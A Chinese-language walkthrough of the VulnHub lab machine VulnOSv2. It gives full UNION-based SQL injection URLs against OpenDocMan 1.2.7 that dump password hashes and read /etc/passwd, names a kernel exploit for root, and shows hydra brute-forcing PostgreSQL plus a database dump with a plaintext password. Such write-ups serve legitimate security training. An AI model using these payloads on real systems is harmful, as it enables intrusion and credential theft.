Vulnhub-VulnOSv2

靶机清单之一。
下载链接:VulnOS 2

信息收集

nmap扫描

nikto

首页已经给了网站链接。

访问/jabcd0cs/,并且用户名密码都可以是guest

登录进去之后,以为能上传getshell,搞了半天都不行。。上传的文件,在uploads下都变成了bat后缀

漏洞利用

opendocman版本是1.2.7的。检索exp数据库看到有个注入,尝试注入

1
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

注入…

1
2
3
4
5
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_name=database()
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=CHAR(111, 100, 109, 95, 117, 115, 101, 114)
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(username),3,4,5,6,7,8,9%20from%20odm_user
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(password),3,4,5,6,7,8,9%20from%20odm_user

  • b78aae356709f8c31118ea613980954b
  • 084e0343a0486ff05530df6c705c8bb4(guest)

读取/etc/passwd文件

1
http://192.168.56.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9


发现也有一个webmin用户,尝试使用爆破出来的密码连接。

登录成功


> 信息枚举中..............

提权

内核信息

通过这个内核信息,检索漏洞利用库。感觉37292和37293很有戏。

利用exp:37292.c

成功提权。

另外的提权方式

看了其他大佬写的writeup发现还有另外一种提权方法。原文

同样是通过注入拿到webmin的密码,然后ssh连接上来。

因为一登入,就有一个post.tar.gz的压缩包,解压后是hydra的源码。有可能是要爆破什么东西。
检索正在运行的服务,发现还有一个postgresql

退出,重新连接将目标机器的5432端口的转发到本地5432端口

1
2
ssh [email protected] -L 5432:localhost:5432
hydra -L `(locate postgres_default_user.txt)` -P `(locate postgres_default_pass.txt)` -s 5432 127.0.0.1 postgres -vvv

之后转储能访问的数据库

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PGPASSWORD="postgres" pg_dumpall -U postgres -h localhost -p 5432

...........一大段信息...........
-- Data for Name: users; Type: TABLE DATA; Schema: public; Owner: postgres
--

COPY public.users ("ID", username, password) FROM stdin;
1 vulnosadmin c4nuh4ckm3tw1c3
\.


--
-- Name: users users_pkey; Type: CONSTRAINT; Schema: public; Owner: postgres
--
...........一大段信息...........

root.blend这个文件,它是一个3D模型文件。里面就是root用户的密码。